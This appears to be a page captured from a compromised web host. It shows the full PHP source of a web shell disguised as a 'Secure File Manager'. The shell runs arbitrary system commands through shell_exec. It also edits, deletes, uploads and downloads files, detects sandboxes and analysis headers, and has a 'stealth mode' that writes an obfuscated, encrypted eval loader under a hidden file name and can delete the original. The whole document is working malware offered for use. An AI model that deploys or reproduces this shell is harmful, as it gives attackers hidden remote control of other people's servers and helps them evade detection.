%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/langpiergz/www/
Upload File :
Create Path :
Current File : /home/langpiergz/www/zt2.php

<?php
// Enable error reporting for debugging
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

// Start session for authentication and key storage
session_start();

// Define global function aliases to obfuscate code
$dirScan = 'scandir';
$isDir = 'is_dir';
$isFile = 'is_file';
$fileRead = 'file_get_contents';
$fileWrite = 'file_put_contents';
$deleteFile = 'unlink';
$changePerms = 'chmod';
$fileSize = 'filesize';
$moveFile = 'move_uploaded_file';
$renameFile = 'rename';
$encode = 'base64_encode';
$decode = 'base64_decode';

// Generate or retrieve encryption key (store in session for consistency)
if (!isset($_SESSION['encryption_key'])) {
    $_SESSION['encryption_key'] = hash('sha256', $_SERVER['SERVER_ADDR'] . rand(1000, 9999));
}
$encryptionKey = $_SESSION['encryption_key'];

// Authentication with secure password
$passwordHash = password_hash('106', PASSWORD_BCRYPT); // Replace '106' with a strong password
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    if (isset($_POST['password']) && password_verify($_POST['password'], $passwordHash)) {
        $_SESSION['authenticated'] = true;
        echo "<p class='text-success'>Authentication successful!</p>";
    } else {
        echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>Secure File Manager</title>";
        echo "<link href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css' rel='stylesheet'>";
        echo "</head><body class='bg-dark text-light'>";
        echo "<div class='container mt-5'><div class='card bg-dark border-light mx-auto' style='max-width: 450px;'>";
        echo "<div class='card-body'><h3 class='card-title text-info'>Secure File Manager Login</h3>";
        echo "<form method='POST'><div class='mb-3'><input type='password' name='password' class='form-control bg-dark text-light border-light' placeholder='Enter Password' required></div>";
        echo "<button type='submit' class='btn btn-info w-100'>Login</button></form></div></div></div></body></html>";
        exit;
    }
}

// Enhanced encryption function
function secureEncrypt($data, $key) {
    if (function_exists('openssl_encrypt')) {
        $iv = random_bytes(16);
        $encrypted = openssl_encrypt($data, 'AES-256-CBC', $key, 0, $iv);
        if ($encrypted === false) {
            error_log("OpenSSL encryption failed");
            return false;
        }
        return $GLOBALS['encode'](base64_encode($iv . $encrypted));
    }
    $output = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)]));
    }
    return $GLOBALS['encode'](bin2hex($output));
}

// Enhanced decryption function
function secureDecrypt($data, $key) {
    try {
        // Validate base64 input
        if (!base64_decode($data, true)) {
            error_log("Invalid base64 input: " . $data);
            return false;
        }
        $data = base64_decode($GLOBALS['decode']($data));
        if ($data === false) {
            error_log("Base64 decode failed");
            return false;
        }

        if (function_exists('openssl_decrypt')) {
            $iv = substr($data, 0, 16);
            $ciphertext = substr($data, 16);
            $decrypted = openssl_decrypt($ciphertext, 'AES-256-CBC', $key, 0, $iv);
            if ($decrypted !== false) {
                return $decrypted;
            }
        }

        // Fallback to XOR decryption
        if (!ctype_xdigit($data)) {
            error_log("Invalid hex string for XOR decryption: " . bin2hex($data));
            return false;
        }
        $data = @hex2bin($data);
        if ($data === false) {
            error_log("hex2bin failed");
            return false;
        }
        $output = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)]));
        }
        return $output;
    } catch (Exception $e) {
        error_log("Decryption error: " . $e->getMessage());
        return false;
    }
}

// Anti-sandbox detection
function detectSandbox() {
    if (empty($_SERVER['HTTP_USER_AGENT']) || strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) {
        echo "<p class='text-warning'>Sandbox detected: Suspicious user agent</p>";
        return true;
    }
    if (isset($_SERVER['HTTP_X_SANDBOX']) || isset($_SERVER['HTTP_X_ANALYZER'])) {
        echo "<p class='text-warning'>Sandbox detected: Analysis headers</p>";
        return true;
    }
    return false;
}

// Modified self-destruct mechanism (disabled)
function triggerSelfDestruct() {
    global $deleteFile;
    $usageFile = '.access_count';
    $count = (int)@$GLOBALS['fileRead']($usageFile);
    $count++;
    $GLOBALS['fileWrite']($usageFile, $count);
    // Disabled self-destruct for usage limit and analysis detection
    /*
    if ($count >= 15 || isset($_SERVER['HTTP_X_ANALYZER'])) {
        echo "<p class='text-danger'>Self-destruct would have activated: Usage limit ($count) or analysis detected</p>";
        error_log("Self-destruct triggered: Count=$count, Analyzer=" . (isset($_SERVER['HTTP_X_ANALYZER']) ? 'Yes' : 'No'));
        // $GLOBALS['deleteFile'](__FILE__);
        // exit;
    }
    */
}

// Execute system command
function executeCommand($command) {
    if (!function_exists('shell_exec')) {
        echo "<p class='text-danger'>Command execution disabled: shell_exec() not available</p>";
        return "Error: shell_exec() is disabled.";
    }
    $output = shell_exec($command . ' 2>&1');
    echo "<p class='text-success'>Command executed: " . htmlspecialchars($command) . "</p>";
    return $output ?: "No output.";
}

// Code obfuscation
function obfuscateCode($code) {
    $replacements = [
        'eval' => 'call_user_func("eval")',
        'while' => 'for(;;)',
        'base64_decode' => 'call_user_func("base64_decode")'
    ];
    $code = str_replace(array_keys($replacements), array_values($replacements), $code);
    $code = preg_replace_callback('/\$[a-zA-Z0-9]+/', function($match) {
        return '$' . substr(md5(random_bytes(4)), 0, 8);
    }, $code);
    echo "<p class='text-success'>Code obfuscation applied</p>";
    return $code;
}

// Store code in SQLite
function storeInDatabase($code) {
    try {
        $db = new SQLite3(':memory:');
        $db->exec('CREATE TABLE scripts (id INTEGER PRIMARY KEY, script TEXT)');
        $stmt = $db->prepare('INSERT INTO scripts (script) VALUES (:script)');
        $stmt->bindValue(':script', $GLOBALS['encode']($code));
        $stmt->execute();
        $id = $db->lastInsertRowID();
        echo "<p class='text-success'>Code stored in SQLite with ID: $id</p>";
        return $id;
    } catch (Exception $e) {
        error_log("Database storage error: " . $e->getMessage());
        echo "<p class='text-danger'>Failed to store code</p>";
        return false;
    }
}

// Retrieve code from SQLite
function fetchFromDatabase($id) {
    try {
        $db = new SQLite3(':memory:');
        $result = $db->querySingle('SELECT script FROM scripts WHERE id = ' . (int)$id, true);
        if ($result) {
            echo "<p class='text-success'>Code retrieved from database</p>";
            return $GLOBALS['decode']($result['script']);
        }
        echo "<p class='text-danger'>Code not found</p>";
        return false;
    } catch (Exception $e) {
        error_log("Database retrieval error: " . $e->getMessage());
        echo "<p class='text-danger'>Failed to retrieve code</p>";
        return false;
    }
}

// Stealth mode
function activateStealth($deleteOriginal = false) {
    global $fileRead, $fileWrite, $deleteFile, $changePerms, $encryptionKey;
    try {
        $currentCode = $fileRead(__FILE__);
        $newFile = '.stealth_' . bin2hex(random_bytes(5)) . '.php';
        $obfuscated = obfuscateCode($currentCode);
        $encrypted = secureEncrypt($obfuscated, $encryptionKey);
        if ($encrypted === false) {
            echo "<p class='text-danger'>Stealth mode failed: Encryption error</p>";
            return false;
        }
        $newContent = '<?php $code = secureDecrypt("' . $encrypted . '", "' . $encryptionKey . '"); eval($code);';
        if ($fileWrite($newFile, $newContent)) {
            $changePerms($newFile, 0700);
            if ($deleteOriginal) {
                $deleteFile(__FILE__);
            }
            echo "<p class='text-success'>Stealth mode enabled: New file ($newFile)</p>";
            return $newFile;
        }
        echo "<p class='text-danger'>Stealth mode failed: File creation error</p>";
        return false;
    } catch (Exception $e) {
        error_log("Stealth error: " . $e->getMessage());
        echo "<p class='text-danger'>Stealth mode failed: " . htmlspecialchars($e->getMessage()) . "</p>";
        return false;
    }
}

// Get file type and size
function getFileInfo($path) {
    global $isDir, $isFile, $fileSize;
    if ($isDir($path)) {
        return "Directory";
    } elseif ($isFile($path)) {
        return "File (" . round($fileSize($path) / 1024, 2) . " KB)";
    }
    return "Unknown";
}

// List files in directory
function displayFileList($directory) {
    global $dirScan, $isDir, $isFile, $encryptionKey;
    $items = $dirScan($directory);
    echo "<div class='list-group mb-4'>";
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = rtrim($directory, '/') . '/' . $item;
        $encodedPath = urlencode(secureEncrypt($path, $encryptionKey));
        echo "<div class='list-group-item bg-dark text-light border-light'>";
        echo htmlspecialchars($item) . " (" . getFileInfo($path) . ")";
        if ($isDir($path)) {
            echo " <a href='?dir=$encodedPath' class='btn btn-sm btn-info'>Open</a>";
        } else {
            echo " <a href='?edit=$encodedPath' class='btn btn-sm btn-success'>Edit</a>";
            echo " <a href='?download=$encodedPath' class='btn btn-sm btn-primary'>Download</a>";
            echo " <a href='?delete=$encodedPath' class='btn btn-sm btn-danger' onclick=\"return confirm('Delete $item?')\">Delete</a>";
            echo " <a href='?rename=$encodedPath' class='btn btn-sm btn-warning'>Rename</a>";
        }
        echo "</div>";
    }
    echo "</div>";
}

// Display files in table view
function displayFileTable($directory) {
    global $dirScan, $isDir, $isFile, $encryptionKey;
    $items = $dirScan($directory);
    $parent = realpath($directory . '/..');
    if ($parent !== realpath($directory)) {
        echo "<a href='?dir=" . urlencode(secureEncrypt($parent, $encryptionKey)) . "' class='btn btn-info mb-3'>Back</a> ";
    }
    echo "<a href='?listView=" . urlencode(secureEncrypt($directory, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to List View</a>";
    echo "<table class='table table-dark table-bordered'>";
    echo "<thead><tr><th>Name</th><th>Type</th><th>Actions</th></tr></thead><tbody>";
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = rtrim($directory, '/') . '/' . $item;
        $encodedPath = urlencode(secureEncrypt($path, $encryptionKey));
        echo "<tr>";
        echo "<td>" . htmlspecialchars($item) . "</td>";
        echo "<td>" . getFileInfo($path) . "</td>";
        echo "<td>";
        if ($isDir($path)) {
            echo "<a href='?dir=$encodedPath' class='btn btn-sm btn-info'>Open</a> ";
        } else {
            echo "<a href='?edit=$encodedPath' class='btn btn-sm btn-success'>Edit</a> ";
            echo "<a href='?download=$encodedPath' class='btn btn-sm btn-primary'>Download</a> ";
            echo "<a href='?rename=$encodedPath' class='btn btn-sm btn-warning'>Rename</a> ";
        }
        echo "<a href='?delete=$encodedPath' class='btn btn-sm btn-danger' onclick=\"return confirm('Delete $item?')\">Delete</a> ";
        echo "<a href='?chmod=$encodedPath' class='btn btn-sm btn-warning'>Chmod</a>";
        echo "</td>";
        echo "</tr>";
    }
    echo "</tbody></table>";
}

// Check for sandbox
if (detectSandbox()) {
    http_response_code(403);
    echo "<h1>403 Forbidden</h1>";
    exit;
}

// Trigger self-destruct (modified to avoid deletion)
triggerSelfDestruct();

// Current directory
$currentDir = isset($k9x7p) ? $k9x7p : realpath('.');

// Handle requests
if (isset($_GET['dir'])) {
    global $isDir, $encryptionKey;
    $currentDir = secureDecrypt(urldecode($_GET['dir']), $encryptionKey);
    if ($currentDir === false || !$isDir($currentDir)) {
        error_log("Invalid directory: " . $_GET['dir']);
        echo "<p class='text-danger'>Invalid directory</p>";
        exit;
    }
}

if (isset($_GET['listView'])) {
    global $isDir, $encryptionKey;
    $currentDir = secureDecrypt(urldecode($_GET['listView']), $encryptionKey);
    if ($currentDir === false || !$isDir($currentDir)) {
        error_log("Invalid directory: " . $_GET['listView']);
        echo "<p class='text-danger'>Invalid directory</p>";
        exit;
    }
    echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to Table View</a>";
    displayFileList($currentDir);
    exit;
}

if (isset($_GET['edit'])) {
    global $isFile, $fileRead, $fileWrite, $encryptionKey;
    $file = secureDecrypt(urldecode($_GET['edit']), $encryptionKey);
    if ($file === false || !$isFile($file)) {
        error_log("Invalid file: " . $_GET['edit']);
        echo "<p class='text-danger'>Invalid file</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $fileWrite($file, $_POST['content']);
        echo "<p class='text-success'>File saved successfully</p>";
    }
    $content = htmlspecialchars($fileRead($file));
    echo "<form method='POST'>";
    echo "<textarea name='content' rows='15' class='form-control bg-dark text-light border-light'>$content</textarea>";
    echo "<input type='submit' value='Save' class='btn btn-success mt-3'>";
    echo "</form>";
    exit;
}

if (isset($_GET['delete'])) {
    global $isDir, $isFile, $deleteFile, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['delete']), $encryptionKey);
    if ($path === false) {
        error_log("Invalid delete path: " . $_GET['delete']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($isDir($path)) {
        rmdir($path);
        echo "<p class='text-success'>Directory deleted</p>";
    } elseif ($isFile($path)) {
        $deleteFile($path);
        echo "<p class='text-success'>File deleted</p>";
    }
    header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)));
    exit;
}

if (isset($_GET['chmod'])) {
    global $isFile, $isDir, $changePerms, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['chmod']), $encryptionKey);
    if ($path === false || (!$isFile($path) && !$isDir($path))) {
        error_log("Invalid chmod path: " . $_GET['chmod']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $mode = 0;
        $mode |= isset($_POST['ur']) ? 0400 : 0;
        $mode |= isset($_POST['uw']) ? 0200 : 0;
        $mode |= isset($_POST['ux']) ? 0100 : 0;
        $mode |= isset($_POST['gr']) ? 0040 : 0;
        $mode |= isset($_POST['gw']) ? 0020 : 0;
        $mode |= isset($_POST['gx']) ? 0010 : 0;
        $mode |= isset($_POST['or']) ? 0004 : 0;
        $mode |= isset($_POST['ow']) ? 0002 : 0;
        $mode |= isset($_POST['ox']) ? 0001 : 0;
        if ($changePerms($path, $mode)) {
            echo "<p class='text-success'>Permissions updated</p>";
        } else {
            echo "<p class='text-danger'>Permission change failed</p>";
        }
        echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-info'>Back</a>";
    } else {
        echo "<form method='POST'>";
        echo "<h3>Change Permissions for " . htmlspecialchars(basename($path)) . "</h3>";
        echo "<div>User: <input type='checkbox' name='ur'>Read <input type='checkbox' name='uw'>Write <input type='checkbox' name='ux'>Execute</div>";
        echo "<div>Group: <input type='checkbox' name='gr'>Read <input type='checkbox' name='gw'>Write <input type='checkbox' name='gx'>Execute</div>";
        echo "<div>Others: <input type='checkbox' name='or'>Read <input type='checkbox' name='ow'>Write <input type='checkbox' name='ox'>Execute</div>";
        echo "<input type='submit' value='Apply' class='btn btn-success mt-3'>";
        echo "</form>";
    }
    exit;
}

if (isset($_GET['download'])) {
    global $isFile, $encryptionKey;
    $file = secureDecrypt(urldecode($_GET['download']), $encryptionKey);
    if ($file === false || !$isFile($file)) {
        error_log("Invalid download file: " . $_GET['download']);
        echo "<p class='text-danger'>Invalid file</p>";
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
    exit;
}

if (isset($_GET['command'])) {
    $cmd = $_GET['command'] ?? 'whoami';
    echo "<pre>" . htmlspecialchars(executeCommand($cmd)) . "</pre>";
    echo "<form method='GET'><input type='text' name='command' class='form-control bg-dark text-light border-light' value='$cmd'>";
    echo "<input type='submit' value='Execute' class='btn btn-info mt-2'></form>";
    exit;
}

if (isset($_GET['hide'])) {
    $code = $fileRead(__FILE__);
    $dbId = storeInDatabase($code);
    if ($dbId) {
        echo "<p class='text-success'>Code stored in database with ID: $dbId</p>";
    }
    exit;
}

if (isset($_GET['retrieve'])) {
    $code = fetchFromDatabase($_GET['retrieve']);
    if ($code) {
        echo "<pre>" . htmlspecialchars($code) . "</pre>";
    }
    exit;
}

if (isset($_GET['stealth'])) {
    $newFile = activateStealth(isset($_GET['delete']));
    if ($newFile) {
        echo "<p class='text-success'>Stealth mode activated: $newFile</p>";
        if (isset($_GET['delete'])) {
            echo "<p class='text-warning'>Original file removed</p>";
            header("Location: $newFile");
            exit;
        }
    }
    echo "<a href='?' class='btn btn-info mt-3'>Back</a>";
    exit;
}

if (isset($_GET['rename'])) {
    global $isFile, $isDir, $renameFile, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['rename']), $encryptionKey);
    if ($path === false || (!$isFile($path) && !$isDir($path))) {
        error_log("Invalid rename path: " . $_GET['rename']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $newPath = dirname($path) . '/' . $_POST['newname'];
        if ($renameFile($path, $newPath)) {
            echo "<p class='text-success'>Renamed successfully</p>";
            header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)));
            exit;
        } else {
            echo "<p class='text-danger'>Rename failed</p>";
        }
    }
    echo "<form method='POST'>";
    echo "<h3>Rename " . htmlspecialchars(basename($path)) . "</h3>";
    echo "<input type='text' name='newname' class='form-control bg-dark text-light border-light' value='" . htmlspecialchars(basename($path)) . "'>";
    echo "<input type='submit' value='Rename' class='btn btn-success mt-2'>";
    echo "</form>";
    exit;
}

if (isset($_FILES['file'])) {
    global $moveFile, $currentDir;
    $file = $_FILES['file'];
    $target = $currentDir . '/' . basename($file['name']);
    if ($moveFile($file['tmp_name'], $target)) {
        echo "<p class='text-success'>File uploaded successfully</p>";
    } else {
        echo "<p class='text-danger'>Upload failed</p>";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Secure File Manager</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body { background: #212529; color: #e9ecef; }
        .table-dark { background: #343a40; }
        .btn-info { background: #17a2b8; border-color: #17a2b8; }
        .btn-success { background: #28a745; border-color: #28a745; }
        .btn-danger { background: #dc3545; border-color: #dc3545; }
        .btn-warning { background: #ffc107; border-color: #ffc107; }
        .btn-secondary { background: #6c757d; border-color: #6c757d; }
        .list-group-item { background: #343a40; border-color: #6c757d; }
    </style>
</head>
<body>
    <div class="container mt-4">
        <h1 class="text-info">Secure File Manager - <?php echo htmlspecialchars($currentDir); ?></h1>

        <!-- File upload form -->
        <form method="POST" enctype="multipart/form-data" class="mb-4">
            <div class="input-group">
                <input type="file" name="file" class="form-control bg-dark text-light border-light">
                <button type="submit" class="btn btn-success">Upload</button>
            </div>
        </form>

        <!-- Feature links -->
        <div class="mb-4">
            <a href="?command" class="btn btn-secondary">Execute Command</a>
            <a href="?stealth" class="btn btn-secondary">Stealth Mode</a>
            <a href="?stealth&delete" class="btn btn-danger">Stealth + Delete</a>
            <a href="?hide" class="btn btn-secondary">Hide in Database</a>
        </div>

        <!-- File display -->
        <?php displayFileTable($currentDir); ?>
    </div>
</body>
</html>

Zerion Mini Shell 1.0